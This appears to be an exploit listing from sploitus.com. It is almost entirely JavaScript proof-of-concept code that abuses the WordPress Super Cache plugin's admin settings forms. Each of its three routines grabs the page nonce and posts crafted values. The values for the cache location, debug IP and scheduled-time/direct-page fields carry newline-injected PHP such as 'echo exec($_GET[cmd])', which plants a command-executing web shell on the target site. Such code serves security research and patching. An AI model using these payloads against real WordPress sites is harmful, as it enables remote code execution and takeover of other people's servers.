Share
## https://sploitus.com/exploit?id=WPEX-ID:2142C3D3-9A7F-4E3C-8776-D469A355D62F
//Exploit $cache_path
url = 'http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&tab=settings';
jQuery.get(url,function(e){
jQuery.post(url,{
"action": "scupdates",
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"wp_cache_enabled": 1,
"wp_cache_location": "/tmp/\n$cache_path\necho exec($_GET[cmd]);#"
})
console.log('SET!');
}).then(()=>{
jQuery.get(url,function(e){
jQuery.post(url,{
"action": "scupdates",
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"wp_cache_enabled": 1,
"wp_cache_location": "./"
})
});
console.log('EXPLOIT!');
});
//Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text
url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=debug';
jQuery.get(url,function(e){
jQuery.post(url,{
"wp_cache_debug": 1,
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"wp_cache_debug_ip": "/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#"
//"wp_super_cache_front_page_text": "/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#"
})
console.log('SET!');
}).then(()=>{
jQuery.get(url,function(e){
jQuery.post(url,{
"wp_cache_debug": 1,
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"wp_cache_debug_ip": "1"
//"wp_super_cache_front_page_text": "1"
})
});
console.log('EXPLOIT!');
});
//Exploit $cache_scheduled_time + $cached_direct_pages
url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=settings';
jQuery.get(url,function(e){
jQuery.post(url,{
"action": "scupdates",
"wp_cache_enabled": "1",
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1]
})
console.log('SET1!');
}).then(()=>{
jQuery.get(url,function(e){
jQuery.post(url,{
"action":"expirytime",
"cache_scheduled_time": "\n`:00",
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"new_direct_page":"`;echo`$_GET[cmd]`;#"
})
}).then(()=>{
console.log('EXPLOIT!');
jQuery.get(url,function(e){
jQuery.post(url,{
"action":"expirytime",
"cache_scheduled_time": "00:00",
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"new_direct_page":"`;echo`$_GET[cmd]`;#"
})
})
});
console.log('SET2!');
});